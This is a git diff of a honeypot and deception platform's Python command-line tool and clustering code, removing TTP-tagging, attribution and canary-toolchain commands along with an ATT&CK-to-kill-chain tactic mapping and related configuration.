from __future__ import annotations
import shutil
import subprocess # nosec B404 — npm exec is the whole point of the toolchain installer
from pathlib import Path
import typer
from . import utils as _utils
from .utils import console, log
_TOOLCHAIN_TIMEOUT_S = 180
def register(app: typer.Typer) -> None:
@app.command(name="canary")
@@ -51,53 +40,3 @@ def register(app: typer.Typer) -> None:
asyncio.run(run())
except KeyboardInterrupt:
console.print("\n[yellow]Canary worker stopped.[/]")
@app.command(name="canary-install-toolchain")
def canary_install_toolchain(
npm_bin: str = typer.Option(
"npm", "--npm-bin", help="Path to the npm executable. Defaults to PATH lookup.",
),
) -> None:
"""Install the Node-side toolchain used by fingerprint canaries.
Runs ``npm install --omit=dev`` under the installed ``decnet/canary/``
directory so the obfuscator's helper script can ``require()``
``javascript-obfuscator`` at mint time. Requires Node >= 18.
Idempotent: re-running on an already-installed tree is fast
(npm short-circuits when ``node_modules/`` is up-to-date).
"""
import decnet.canary as _canary_pkg
canary_dir = Path(_canary_pkg.__file__).resolve().parent
if not (canary_dir / "package.json").is_file():
console.print(
f"[red]canary package.json not found under {canary_dir}; "
"wheel may be missing the JS toolchain payload.[/]"
)
raise typer.Exit(code=2)
if shutil.which(npm_bin) is None:
console.print(
f"[red]npm executable {npm_bin!r} not found on PATH. "
"Install Node >= 18 and re-run.[/]"
)
raise typer.Exit(code=2)
console.print(
f"[cyan]installing canary toolchain[/] in {canary_dir}",
)
try:
proc = subprocess.run( # nosec B603 — argv-form, no shell, fixed cwd, npm_bin checked above
[npm_bin, "install", "--omit=dev", "--no-fund", "--no-audit"],
cwd=str(canary_dir),
capture_output=True, text=True,
timeout=_TOOLCHAIN_TIMEOUT_S, check=False,
)
except subprocess.TimeoutExpired:
console.print("[red]npm install timed out after 3 minutes[/]")
raise typer.Exit(code=3) from None
if proc.returncode != 0:
console.print(
f"[red]npm install failed rc={proc.returncode}[/]\n"
f"{proc.stderr.strip()}"
)
raise typer.Exit(code=proc.returncode)
console.print("[green]canary toolchain ready[/]")

View File

@@ -30,10 +30,6 @@ MASTER_ONLY_COMMANDS: frozenset[str] = frozenset({
"mutate", "listener", "profiler",
"services", "distros", "correlate", "archetypes", "web",
"db-reset", "init", "webhook", "clusterer", "campaign-clusterer",
# `ttp` runs on agents — local SMTP decoys persist .eml files into the
# agent's artifacts tree and the EmailLifter disk-reaches them in-process
# (DEBT-047). `ttp-backfill` stays master-only: it walks the master DB.
"ttp-backfill",
})
MASTER_ONLY_GROUPS: frozenset[str] = frozenset(
{"swarm", "topology", "geoip", "realism"}
@@ -69,7 +65,7 @@ def _gate_commands_by_mode(_app: typer.Typer) -> None:
return
_app.registered_commands = [
c for c in _app.registered_commands
if (c.name or (c.callback.__name__ if c.callback else "")) not in MASTER_ONLY_COMMANDS
if (c.name or c.callback.__name__) not in MASTER_ONLY_COMMANDS
]
_app.registered_groups = [
g for g in _app.registered_groups

View File

@@ -44,12 +44,6 @@ _CONFIG_PLACEHOLDER = """\
# EnvironmentFile= — never in a group-readable INI.
[decnet]
# DECNET-service user/group as configured at `decnet init` time.
# Resolved to a uid/gid on each host at deploy time via pwd.getpwnam,
# so the same user name can have different numeric uids on master vs
# agents without breaking artifact ownership.
api-user = {api_user}
api-group = {api_group}
# mode = master # or "agent"
# [api]
@@ -80,7 +74,6 @@ api-group = {api_group}
# master-host = 10.0.0.1
# syslog-port = 6514
# swarmctl-port = 8770
# swarmctl-host = 127.0.0.1
# [logging]
# system-log = /var/log/decnet/decnet.system.log
@@ -204,17 +197,14 @@ def _ensure_dir(
return f"skip: {path} already present" if existed else "ok"
def _ensure_config(
path: Path, group: str, *, user: str, dry_run: bool,
) -> str:
def _ensure_config(path: Path, group: str, *, dry_run: bool) -> str:
if path.exists():
return f"skip: {path} already present"
if dry_run:
console.print(f" [dim]would write:[/] {path}")
return "ok"
path.parent.mkdir(parents=True, exist_ok=True)
rendered = _CONFIG_PLACEHOLDER.format(api_user=user, api_group=group)
path.write_text(rendered)
path.write_text(_CONFIG_PLACEHOLDER)
try:
os.chmod(path, 0o640)
gid = grp.getgrnam(group).gr_gid
@@ -611,7 +601,7 @@ def register(app: typer.Typer) -> None:
# (Path("/"). / "/opt/decnet" == Path("/opt/decnet"), dropping pfx).
_install_rel = install_dir.lstrip("/")
required_tools: tuple[str, ...] = ("systemctl",) if deinit else (
required_tools = ("systemctl",) if deinit else (
"systemctl", "useradd", "groupadd", "systemd-tmpfiles",
)
if deinit:
@@ -668,7 +658,7 @@ def register(app: typer.Typer) -> None:
)
_step(
"systemctl daemon-reload",
lambda: (_run(["systemctl", "daemon-reload"], dry_run=dry_run), "ok")[1], # type: ignore[func-returns-value]
lambda: (_run(["systemctl", "daemon-reload"], dry_run=dry_run), "ok")[1],
)
_step(
f"remove {etc_decnet / 'decnet.ini'}",
@@ -764,13 +754,6 @@ def register(app: typer.Typer) -> None:
(pfx / _install_rel, 0o755, user, group),
(pfx / "var/lib/decnet", 0o750, user, group),
(pfx / "var/lib/decnet/geoip", 0o755, user, group),
# DEBT-035 / DEBT-047: artifact root carries setgid (the
# 0o2... bit) so every file written under it inherits the
# decnet group regardless of which container's uid created
# it. Group-write (0o2775) lets the API process and the
# local TTP worker read each other's outputs without a
# manual chown after every fresh deploy.
(pfx / "var/lib/decnet/artifacts", 0o2775, user, group),
(pfx / "var/log/decnet", 0o750, user, group),
(etc_decnet, 0o755, "root", group),
(pfx / "run/decnet", 0o755, "root", group),
@@ -792,15 +775,12 @@ def register(app: typer.Typer) -> None:
for path, mode, d_owner, d_group in dirs:
_step(
f"ensure dir {path}",
lambda p=path, m=mode, o=d_owner, g=d_group: # type: ignore[misc]
lambda p=path, m=mode, o=d_owner, g=d_group:
_ensure_dir(p, mode=m, owner=o, group=g, dry_run=dry_run),
)
_step(
f"write {etc_decnet / 'decnet.ini'}",
lambda: _ensure_config(
etc_decnet / "decnet.ini", group,
user=user, dry_run=dry_run,
),
lambda: _ensure_config(etc_decnet / "decnet.ini", group, dry_run=dry_run),
)
_step(
"install systemd units",
@@ -832,7 +812,7 @@ def register(app: typer.Typer) -> None:
)
_step(
"systemctl daemon-reload",
lambda: (_run(["systemctl", "daemon-reload"], dry_run=dry_run), "ok")[1], # type: ignore[func-returns-value]
lambda: (_run(["systemctl", "daemon-reload"], dry_run=dry_run), "ok")[1],
)
if no_start:
@@ -843,7 +823,7 @@ def register(app: typer.Typer) -> None:
_step(
"systemctl enable --now decnet.target",
lambda: (
_run( # type: ignore[func-returns-value]
_run(
["systemctl", "enable", "--now", "decnet.target"],
dry_run=dry_run,
),

View File

@@ -16,16 +16,8 @@ from .utils import console, log
def register(app: typer.Typer) -> None:
@app.command()
def swarmctl(
port: int = typer.Option(
8770, "--port",
envvar="DECNET_SWARMCTL_PORT",
help="Port for the swarm controller. Defaults to [swarm] swarmctl-port from /etc/decnet/decnet.ini, else 8770.",
),
host: str = typer.Option(
"127.0.0.1", "--host",
envvar="DECNET_SWARMCTL_HOST",
help="Bind address for the swarm controller. Defaults to [swarm] swarmctl-host from /etc/decnet/decnet.ini, else 127.0.0.1.",
),
port: int = typer.Option(8770, "--port", help="Port for the swarm controller"),
host: str = typer.Option("127.0.0.1", "--host", help="Bind address for the swarm controller"),
daemon: bool = typer.Option(False, "--daemon", "-d", help="Detach to background as a daemon process"),
no_listener: bool = typer.Option(False, "--no-listener", help="Do not auto-spawn the syslog-TLS listener alongside swarmctl"),
tls: bool = typer.Option(False, "--tls", help="Serve over HTTPS with mTLS (required for cross-host worker heartbeats)"),

View File

@@ -233,8 +233,8 @@ def _delete(
topo = await repo.get_topology(topology_id)
if topo is None:
return False, "not-found"
if topo.status in _RUNNING:
return False, str(topo.status)
if topo["status"] in _RUNNING:
return False, str(topo["status"])
ok = await repo.delete_topology_cascade(topology_id)
return ok, None

View File

@@ -1,309 +0,0 @@
"""``decnet ttp`` — TTP-tagging worker and admin commands.
Two flat commands share this module:
* ``decnet ttp`` — runs the long-running tagger worker. Bus-woken on
``attacker.session.ended`` / ``attacker.observed`` /
``attacker.intel.enriched`` / ``identity.{formed,merged}`` /
``credential.reuse.detected`` / ``email.received`` / ``canary.>``;
dispatches each event through :class:`CompositeTagger` (RuleEngine +
Behavioral / Intel / CanaryFingerprint / Email / Identity / Credential
lifters), persists ``ttp_tag`` rows via the idempotent
``INSERT OR IGNORE`` write, and publishes ``ttp.tagged`` +
``ttp.rule.fired.<technique_id>`` only when the insert returned a
non-zero rowcount (loop-prevention invariant from TTP_TAGGING.md
§"Bus topics"). Invoked by the ``decnet-ttp.service`` systemd unit
so its argv must stay stable.
* ``decnet ttp-backfill`` — replays historical events (shell commands
recorded on :class:`Attacker.commands`, :class:`CanaryTrigger` rows)
through the live tagger. Writes ``ttp_tag`` rows using the same
idempotent insert path. **Does not publish** to the bus — replay must
not re-trigger SIEM/webhook fan-out on already-attributed events.
Both are master-only — gated via ``MASTER_ONLY_COMMANDS`` in
:mod:`decnet.cli.gating`.
"""
from __future__ import annotations
import asyncio
import time
from datetime import datetime, timedelta, timezone
from typing import Any
import typer
from decnet.ttp.factory import CompositeTagger, get_tagger
from . import utils as _utils
from .utils import console, log
_BACKFILL_SOURCES = ("command", "canary", "all")
def register(app: typer.Typer) -> None:
@app.command(name="ttp")
def ttp(
poll_interval_secs: float = typer.Option(
60.0, "--poll-interval", "-i",
help="Slow-tick fallback when the bus is idle or unavailable (seconds)",
),
daemon: bool = typer.Option(
False, "--daemon", "-d",
help="Detach to background as a daemon process",
),
) -> None:
"""TTP-tagging worker — MITRE ATT&CK technique tagging."""
from decnet.ttp.worker import run_ttp_worker_loop
from decnet.web.dependencies import repo
if daemon:
log.info("ttp daemonizing poll=%s", poll_interval_secs)
_utils._daemonize()
log.info("ttp command invoked poll=%s", poll_interval_secs)
console.print(
f"[bold cyan]TTP tagging worker starting[/] "
f"poll={poll_interval_secs}s"
)
console.print("[dim]Press Ctrl+C to stop[/]")
async def _run() -> None:
await repo.initialize()
await run_ttp_worker_loop(
repo, poll_interval_secs=poll_interval_secs,
)
try:
asyncio.run(_run())
except KeyboardInterrupt:
console.print("\n[yellow]TTP tagging worker stopped.[/]")
@app.command(name="ttp-backfill")
def ttp_backfill(
since_days: int = typer.Option(
7, "--since-days", "-s",
min=1, max=3650,
help="Replay events whose source row is newer than N days ago.",
),
source: str = typer.Option(
"all", "--source",
help=f"Source slice to replay. One of: {', '.join(_BACKFILL_SOURCES)}.",
),
dry_run: bool = typer.Option(
False, "--dry-run",
help="Run the tagger but skip insert_tags. Reports counts only.",
),
batch_size: int = typer.Option(
500, "--batch-size",
min=1, max=100_000,
help="Number of tags accumulated before each repo.insert_tags call.",
),
) -> None:
"""Replay historical attacker activity through the live tagger.
Walks ``Attacker.commands`` (per-IP shell-command history) and
``CanaryTrigger`` (canary callback log) since N days ago,
builds the same :class:`TaggerEvent` shape the live worker
emits, and persists tags via the idempotent INSERT OR IGNORE
write. Re-running is safe — a second pass over identical
source rows reports ``inserted=0``.
Bus publish is intentionally suppressed; SIEM / webhook fan-out
sees only live events, never replays.
"""
from decnet.cli.gating import _require_master_mode
from decnet.web.dependencies import repo
_require_master_mode("ttp-backfill")
if source not in _BACKFILL_SOURCES:
console.print(
f"[red]invalid --source {source!r}; expected one of "
f"{_BACKFILL_SOURCES}[/]"
)
raise typer.Exit(code=2)
cutoff = datetime.now(tz=timezone.utc) - timedelta(days=since_days)
console.print(
f"[bold cyan]TTP backfill[/] since={cutoff.isoformat()} "
f"source={source} dry_run={dry_run} batch_size={batch_size}"
)
async def _run() -> None:
await repo.initialize()
await _backfill(
repo,
cutoff=cutoff,
sources=_resolve_sources(source),
dry_run=dry_run,
batch_size=batch_size,
)
try:
asyncio.run(_run())
except KeyboardInterrupt:
console.print("\n[yellow]Backfill interrupted.[/]")
def _resolve_sources(name: str) -> tuple[str, ...]:
if name == "all":
return ("command", "canary")
return (name,)
async def _backfill(
repo: Any,
*,
cutoff: datetime,
sources: tuple[str, ...],
dry_run: bool,
batch_size: int,
) -> None:
"""Drive the per-source backfill loops and report structured counts.
One :class:`CompositeTagger` is built once and reused for every
source — the per-lifter watch fan-out the live worker performs is
inlined here as a `watch_store()` startup task per
:class:`WatchableTagger`, so the dispatch indexes hydrate before
we start feeding events.
"""
# Import-time bound so tests can monkeypatch ``decnet.cli.ttp.get_tagger``
# to inject a recording fake without touching the global factory.
tagger = get_tagger()
watch_tasks: list[asyncio.Task[None]] = []
if isinstance(tagger, CompositeTagger):
for watchable in tagger.iter_watchables():
watch_tasks.append(asyncio.create_task(watchable.watch_store()))
# Yield once so each watch_store gets a chance to run its
# initial `load_compiled` before we feed the first event.
await asyncio.sleep(0.05)
try:
if "command" in sources:
await _backfill_commands(
repo, tagger, cutoff=cutoff,
dry_run=dry_run, batch_size=batch_size,
)
if "canary" in sources:
await _backfill_canaries(
repo, tagger, cutoff=cutoff,
dry_run=dry_run, batch_size=batch_size,
)
finally:
for task in watch_tasks:
task.cancel()
for task in watch_tasks:
try:
await task
except (asyncio.CancelledError, Exception): # noqa: BLE001
pass
async def _backfill_commands(
repo: Any,
tagger: Any,
*,
cutoff: datetime,
dry_run: bool,
batch_size: int,
) -> None:
from decnet.ttp.base import TaggerEvent
started = time.monotonic()
rows_seen = 0
cmds_seen = 0
inserted = 0
pending: list[Any] = []
async for attacker, commands in repo.iter_attacker_commands_since(cutoff):
rows_seen += 1
for idx, cmd in enumerate(commands):
cmds_seen += 1
text = cmd.get("command_text") or cmd.get("text")
if not isinstance(text, str):
continue
cmd_id = (
cmd.get("id")
or cmd.get("uuid")
or cmd.get("command_id")
or f"{attacker.uuid}#cmd{idx}"
)
event = TaggerEvent(
source_kind="command",
source_id=str(cmd_id),
attacker_uuid=attacker.uuid,
identity_uuid=getattr(attacker, "identity_id", None),
session_id=cmd.get("session_id"),
decky_id=cmd.get("decky_id") or cmd.get("decky"),
payload={**cmd, "command_text": text},
)
tags = await tagger.tag(event)
if tags:
pending.extend(tags)
if len(pending) >= batch_size:
inserted += await _flush(repo, pending, dry_run)
pending = []
if pending:
inserted += await _flush(repo, pending, dry_run)
elapsed = time.monotonic() - started
console.print(
f"source=command rows={rows_seen} commands={cmds_seen} "
f"inserted={inserted} dry_run={dry_run} elapsed_s={elapsed:.2f}"
)
async def _backfill_canaries(
repo: Any,
tagger: Any,
*,
cutoff: datetime,
dry_run: bool,
batch_size: int,
) -> None:
from decnet.ttp.base import TaggerEvent
started = time.monotonic()
rows_seen = 0
inserted = 0
pending: list[Any] = []
async for trigger in repo.iter_canary_triggers_since(cutoff):
rows_seen += 1
event = TaggerEvent(
source_kind="canary_fingerprint",
source_id=trigger.uuid,
attacker_uuid=trigger.attacker_id,
identity_uuid=None,
session_id=None,
decky_id=None,
payload={
"token_uuid": trigger.token_uuid,
"src_ip": trigger.src_ip,
"ua_signature": trigger.user_agent or "",
"user_agent": trigger.user_agent,
"request_path": trigger.request_path,
"dns_qname": trigger.dns_qname,
"headers": trigger.headers(),
},
)
tags = await tagger.tag(event)
if tags:
pending.extend(tags)
if len(pending) >= batch_size:
inserted += await _flush(repo, pending, dry_run)
pending = []
if pending:
inserted += await _flush(repo, pending, dry_run)
elapsed = time.monotonic() - started
console.print(
f"source=canary rows={rows_seen} inserted={inserted} "
f"dry_run={dry_run} elapsed_s={elapsed:.2f}"
)
async def _flush(repo: Any, tags: list[Any], dry_run: bool) -> int:
if dry_run:
return 0
return int(await repo.insert_tags(tags))

View File

@@ -11,7 +11,7 @@ import signal
import subprocess # nosec B404
import sys
from pathlib import Path
from typing import Any, Callable, Optional
from typing import Optional
import typer
from rich.console import Console
@@ -96,7 +96,7 @@ def _is_running(match_fn) -> int | None:
return None
def _service_registry(log_file: str) -> list[tuple[str, Callable[..., Any], list[str]]]:
def _service_registry(log_file: str) -> list[tuple[str, callable, list[str]]]:
"""Return the microservice registry for health-check and relaunch.
On agents these run as systemd units invoking /usr/local/bin/decnet,
@@ -195,7 +195,7 @@ _DEFAULT_SWARMCTL_URL = "http://127.0.0.1:8770"
def _swarmctl_base_url(url: Optional[str]) -> str:
return url or os.environ.get("DECNET_SWARMCTL_URL") or _DEFAULT_SWARMCTL_URL
return url or os.environ.get("DECNET_SWARMCTL_URL", _DEFAULT_SWARMCTL_URL)
def _http_request(method: str, url: str, *, json_body: Optional[dict] = None, timeout: float = 30.0):

View File

@@ -192,70 +192,6 @@ def register(app: typer.Typer) -> None:
except KeyboardInterrupt:
console.print("\n[yellow]Reuse correlator stopped.[/]")
@app.command(name="attribution")
def attribution(
multi_actor_tick_secs: float = typer.Option(
60.0, "--multi-actor-tick", "-t",
help=(
"Cross-primitive multi_actor correlator tick interval (seconds). "
"Walks attribution_state for identities flagged on >= 2 "
"primitives and emits attribution.profile.multi_actor_suspected."
),
),
daemon: bool = typer.Option(
False, "--daemon", "-d",
help="Detach to background as a daemon process",
),
) -> None:
"""Attribution engine v0 — per-(identity, primitive) state machine.
Subscribes to ``attacker.observation.>`` and, for each event,
ensures a stub identity row, runs the merger over the full
per-(identity, primitive) observation series, upserts the
derived state, and publishes
``attribution.profile.state_changed`` only on transition.
Periodic tick fires
``attribution.profile.multi_actor_suspected`` when >= 2
primitives flag the same identity.
Closes DEBT-051. Bright-line scope: behavioural coherence and
drift only — never persona attribution to natural persons.
"""
import asyncio
from decnet.correlation.attribution_worker import (
run_attribution_loop,
)
from decnet.web.dependencies import repo
if daemon:
log.info(
"attribution worker daemonizing tick=%s",
multi_actor_tick_secs,
)
_utils._daemonize()
log.info(
"attribution worker command invoked tick=%s",
multi_actor_tick_secs,
)
console.print(
f"[bold cyan]Attribution engine starting[/] "
f"multi_actor_tick={multi_actor_tick_secs}s"
)
console.print("[dim]Press Ctrl+C to stop[/]")
async def _run() -> None:
await repo.initialize()
await run_attribution_loop(
repo,
multi_actor_tick_secs=multi_actor_tick_secs,
)
try:
asyncio.run(_run())
except KeyboardInterrupt:
console.print("\n[yellow]Attribution engine stopped.[/]")
@app.command(name="clusterer")
def clusterer(
poll_interval_secs: float = typer.Option(
@@ -359,10 +295,3 @@ def register(app: typer.Typer) -> None:
asyncio.run(_run())
except KeyboardInterrupt:
console.print("\n[yellow]Campaign clusterer stopped.[/]")
# ``decnet ttp`` and ``decnet ttp-backfill`` moved to
# :mod:`decnet.cli.ttp` — the TTP CLI surface (worker + admin verbs)
# is colocated there, mirroring the per-feature CLI split used by
# :mod:`decnet.cli.canary`, :mod:`decnet.cli.webhook`, etc. The
# ``decnet-ttp.service`` systemd unit's ExecStart still resolves to
# ``decnet ttp`` because the command name is unchanged.

View File

@@ -66,10 +66,7 @@ def cluster_identities(
return {f.identity_uuid: f"cmp-{find(f.identity_uuid)}" for f in feat_list}
def from_identity_row(
row: dict[str, Any],
ttp_decky_phases: list[dict[str, Any]] | None = None,
) -> IdentityFeatures:
def from_identity_row(row: dict[str, Any]) -> IdentityFeatures:
"""Project an ``AttackerIdentity`` projection row dict into an
:class:`IdentityFeatures`.
@@ -78,59 +75,20 @@ def from_identity_row(
ja3_hashes / hassh_hashes / payload_simhashes / c2_endpoints
(JSON list[str] or null).
*ttp_decky_phases* is the optional per-identity payload from
:meth:`BaseRepository.list_ttp_decky_phases` — one row per
``ttp_tag`` carrying ``(decky_id, tactic, created_at_ts)``. When
provided, the adapter projects ``tactic`` → :class:`UKCPhase` and
populates :attr:`IdentityFeatures.first_phase_per_decky` /
``last_phase_per_decky`` / ``first_seen_per_decky`` /
``last_seen_per_decky` so the production phase-handoff edge
finally fires. The synthetic fixture path
(:func:`from_synthetic_identity`) is unchanged — fixtures keep
emitting UKC directly.
Phase-handoff fields stay empty until the production-row adapter
learns to mine logs for per-decky phase sequences (TODO.md
"production-side payload + C2 + commands joins"). Without those,
the campaign clusterer falls back to shared-infra + temporal
overlap + cohort signals on production data; the fixture path
exercises the full feature set via :func:`from_synthetic_identity`.
"""
from decnet.clustering.ukc import tactic_to_ukc_phase # noqa: PLC0415
payload_hashes = _parse_json_list(row.get("payload_simhashes"))
c2_endpoints = _parse_json_list(row.get("c2_endpoints"))
first_phase_per_decky: dict[str, str] = {}
last_phase_per_decky: dict[str, str] = {}
first_seen_per_decky: dict[str, float] = {}
last_seen_per_decky: dict[str, float] = {}
decky_set: set[str] = set()
# Rows arrive ordered by ``created_at``; ``setdefault`` preserves
# the FIRST observation per decky, plain assignment captures the
# LAST. Tags whose tactic is outside the ATT&CK→UKC map (or whose
# phase is pre-target / unobservable) are dropped — they should
# not be assigned by any rule per TTP_TAGGING.md §UKC bridge.
for entry in ttp_decky_phases or []:
decky = entry.get("decky_id")
tactic = entry.get("tactic")
created_at_ts = entry.get("created_at_ts")
if not isinstance(decky, str) or not isinstance(tactic, str):
continue
phase = tactic_to_ukc_phase(tactic)
if phase is None:
continue
ts = float(created_at_ts) if isinstance(
created_at_ts, (int, float)) else 0.0
decky_set.add(decky)
first_phase_per_decky.setdefault(decky, phase.value)
last_phase_per_decky[decky] = phase.value
first_seen_per_decky.setdefault(decky, ts)
last_seen_per_decky[decky] = ts
return IdentityFeatures(
identity_uuid=row["uuid"],
payload_hashes=frozenset(payload_hashes),
c2_endpoints=frozenset(c2_endpoints),
decky_set=frozenset(decky_set),
first_phase_per_decky=first_phase_per_decky,
last_phase_per_decky=last_phase_per_decky,
first_seen_per_decky=first_seen_per_decky,
last_seen_per_decky=last_seen_per_decky,
)
@@ -174,26 +132,8 @@ class ConnectedComponentsCampaignClusterer(CampaignClusterer):
# merged out — their winner is the active row and gets clustered
# on its own. This keeps the campaign graph from double-counting.
active_rows = [r for r in rows if not r.get("merged_into_uuid")]
# Pull TTP-derived per-decky phase observations per identity
# (E.3.15). Failures here are non-fatal — the clusterer falls
# back to the empty phase-handoff signal, same as the legacy
# behavior, so a partial repo doesn't take the worker down.
decky_phases_by_identity: dict[str, list[dict[str, Any]]] = {}
for r in active_rows:
try:
decky_phases_by_identity[r["uuid"]] = (
await repo.list_ttp_decky_phases(r["uuid"])
)
except Exception: # noqa: BLE001
log.warning(
"campaign clusterer: list_ttp_decky_phases failed "
"for identity %s; phase-handoff edge inert",
r["uuid"],
)
decky_phases_by_identity[r["uuid"]] = []
feature_list: list[IdentityFeatures] = [
from_identity_row(r, decky_phases_by_identity.get(r["uuid"]))
for r in active_rows
from_identity_row(r) for r in active_rows
]
row_by_uuid: dict[str, dict[str, Any]] = {
r["uuid"]: r for r in active_rows

View File

@@ -342,7 +342,7 @@ def combined_campaign_weight(
# ─── Adapter for synthetic-fixture tests ────────────────────────────────────
def from_synthetic_identity(att, identity_uuid: Optional[str] = None) -> IdentityFeatures:
def from_synthetic_identity(att, identity_uuid: Optional[str] = None) -> IdentityFeatures: # type: ignore[no-untyped-def]
"""Build an :class:`IdentityFeatures` from a ``SyntheticAttacker``.
Treats one ``SyntheticAttacker`` as one identity — adequate for

View File

@@ -105,11 +105,11 @@ async def run_campaign_clusterer_loop(
t.cancel()
if heartbeat_task is not None:
heartbeat_task.cancel()
for task in (*wake_tasks, heartbeat_task):
if task is None:
for t in (*wake_tasks, heartbeat_task):
if t is None:
continue
with contextlib.suppress(asyncio.CancelledError, Exception):
await task
await t
if bus is not None:
with contextlib.suppress(Exception):
await bus.close()

View File

@@ -363,9 +363,8 @@ async def _roll_up_fingerprints(
breaks the clusterer tick — the columns just stay stale until the
next pass."""
summaries = extract_fp_summaries(member_rows)
fp_kwargs = {k: v for k, v in summaries.items() if k in {"ja3_hashes", "hassh_hashes", "tls_cert_sha256"}}
try:
await repo.update_identity_fingerprints(identity_uuid, **fp_kwargs)
await repo.update_identity_fingerprints(identity_uuid, **summaries)
except Exception: # noqa: BLE001
log.exception(
"clusterer: failed to roll up fingerprints for identity=%s",

View File

@@ -265,7 +265,7 @@ def combined_edge_weight(a: Observation, b: Observation) -> float:
# ─── Adapter for the synthetic-corpus tests ─────────────────────────────────
def from_synthetic(att) -> Observation:
def from_synthetic(att) -> Observation: # type: ignore[no-untyped-def]
"""Build an :class:`Observation` from a ``SyntheticAttacker``.
Lives here so test code doesn't import the factory shape into the

View File

@@ -15,7 +15,6 @@ emits no events for unobservable phases.
from __future__ import annotations
from enum import Enum
from typing import Final
class UKCPhase(str, Enum):
@@ -107,96 +106,3 @@ def stage_of(phase: UKCPhase) -> str:
if phase in STAGE_THROUGH:
return "through"
return "out"
# MITRE ATT&CK tactic ID -> UKC phase. Covers the 14 enterprise tactics
# plus the four ICS tactics referenced by Appendix A.7 (Conpot, MQTT).
# Adding additional ICS tactics is a one-line addition. See
# TTP_TAGGING.md "UKC bridge".
ATTACK_TACTIC_TO_UKC: dict[str, UKCPhase] = {
# Enterprise
"TA0043": UKCPhase.RECONNAISSANCE, # Reconnaissance
"TA0042": UKCPhase.RESOURCE_DEVELOPMENT, # Resource Development
"TA0001": UKCPhase.DELIVERY, # Initial Access
"TA0002": UKCPhase.EXECUTION, # Execution
"TA0003": UKCPhase.PERSISTENCE, # Persistence
"TA0004": UKCPhase.PRIVILEGE_ESCALATION, # Privilege Escalation
"TA0005": UKCPhase.DEFENSE_EVASION, # Defense Evasion
"TA0006": UKCPhase.CREDENTIAL_ACCESS, # Credential Access
"TA0007": UKCPhase.DISCOVERY, # Discovery
"TA0008": UKCPhase.LATERAL_MOVEMENT, # Lateral Movement
"TA0009": UKCPhase.COLLECTION, # Collection
"TA0011": UKCPhase.COMMAND_AND_CONTROL, # Command and Control
"TA0010": UKCPhase.EXFILTRATION, # Exfiltration
"TA0040": UKCPhase.IMPACT, # Impact
# ICS — first-class projection so MQTT / Conpot / Modbus tags
# don't drop out of campaign rollups when the clusterer projects
# tactic to phase. ICS uses an independent tactic-ID range.
"TA0100": UKCPhase.COLLECTION, # ICS: Collection
"TA0102": UKCPhase.DISCOVERY, # ICS: Discovery
"TA0105": UKCPhase.IMPACT, # ICS: Impact
"TA0106": UKCPhase.IMPACT, # ICS: Impair Process Control
}
# ICS tactics live in a separate STIX bundle (mitre/ics-attack) that
# DECNET does not currently load. They're exempt from the
# enterprise-bundle validation in :func:`validate_against_attack_bundle`
# so a startup check doesn't false-fail the moment ICS rules are wired.
_NON_ENTERPRISE_TACTICS: Final[frozenset[str]] = frozenset(
{"TA0100", "TA0102", "TA0105", "TA0106"}
)
def validate_against_attack_bundle() -> None:
"""Assert every enterprise tactic ID in :data:`ATTACK_TACTIC_TO_UKC` resolves in the loaded STIX bundle.
Called at startup (see :mod:`decnet.ttp.impl.rule_engine`) so a
typoed tactic ID surfaces as a fail-closed boot, not a silent
miss in campaign rollups.
"""
from decnet.ttp.attack_stix import assert_known_tactic_ids
assert_known_tactic_ids(
list(ATTACK_TACTIC_TO_UKC.keys()),
source="decnet.clustering.ukc.ATTACK_TACTIC_TO_UKC",
exempt=set(_NON_ENTERPRISE_TACTICS),
)
def tactic_to_ukc_phase(tactic: str) -> UKCPhase | None:
"""Map an ATT&CK tactic ID (e.g. ``"TA0001"``) to a :class:`UKCPhase`.
Returns ``None`` for unknown tactics. The map is closed-over the
enterprise + ICS tactics referenced by the rule pack; a tactic
outside that set is a contributor bug, not a runtime miss.
"""
return ATTACK_TACTIC_TO_UKC.get(tactic)
# Inverse map, built once at import time. Several enterprise tactics
# would collide (e.g. both TA0009 and TA0100 map to COLLECTION); the
# enterprise tactic wins because it's listed first in
# ATTACK_TACTIC_TO_UKC, which dict comprehension preserves via
# last-write semantics — so we iterate in reverse to keep the FIRST
# occurrence per phase. Pre-target phases (RECONNAISSANCE,
# RESOURCE_DEVELOPMENT, WEAPONIZATION, SOCIAL_ENGINEERING) that are
# not in OBSERVABLE_PHASES are deliberately lossy on the inverse —
# TTP tags must never assign them, so projecting back to a tactic
# is undefined. See TTP_TAGGING.md §UKC bridge.
_UKC_TO_TACTIC: dict[UKCPhase, str] = {
phase: tactic
for tactic, phase in reversed(list(ATTACK_TACTIC_TO_UKC.items()))
}
def ukc_phase_to_tactic(phase: UKCPhase) -> str | None:
"""Map a :class:`UKCPhase` back to an ATT&CK tactic ID.
Lossy on phases outside :data:`OBSERVABLE_PHASES` — pre-target
phases (e.g. ``RECONNAISSANCE``, ``WEAPONIZATION``) return
``None`` because no rule emits them, so the inverse is
undefined by design. The CDD test in E.2.9 pins which phases
are lossy.
"""
return _UKC_TO_TACTIC.get(phase)

View File

@@ -115,11 +115,11 @@ async def run_clusterer_loop(
t.cancel()
if heartbeat_task is not None:
heartbeat_task.cancel()
for task in (*wake_tasks, heartbeat_task):
if task is None:
for t in (*wake_tasks, heartbeat_task):
if t is None:
continue
with contextlib.suppress(asyncio.CancelledError, Exception):
await task
await t
if bus is not None:
with contextlib.suppress(Exception):
await bus.close()

View File

@@ -18,7 +18,6 @@ from datetime import datetime
from pathlib import Path
from typing import Any, Callable, Optional
from decnet.artifacts.shards import find_shard_with_sid
from decnet.bus import topics as _topics
from decnet.bus.factory import get_bus
from decnet.bus.publish import (
@@ -76,21 +75,6 @@ _RL_EVENT_TYPES: frozenset[str] = frozenset(
)
_RL_MAX_ENTRIES: int = 10_000
# APP-NAMEs we never want to see in the ingestion stream — native unix
# daemons that share a container with a DECNET service. Their logs are
# noise: sshd's "Failed password for root from X" duplicates the
# auth-helper's structured `auth_attempt` event, pam_unix repeats it
# again, and CRON/systemd/etc. say nothing about attacker behavior.
# Override or extend with DECNET_COLLECTOR_DROP_APPS (comma list).
_DROP_APPS: frozenset[str] = frozenset(
a.strip()
for a in os.environ.get(
"DECNET_COLLECTOR_DROP_APPS",
"sshd,pam_unix,sudo,su,CRON,cron,systemd,kernel,rsyslogd,dbus-daemon",
).split(",")
if a.strip()
)
_rl_lock: threading.Lock = threading.Lock()
_rl_last: dict[tuple[str, str, str, str], float] = {}
@@ -98,11 +82,10 @@ _rl_last: dict[tuple[str, str, str, str], float] = {}
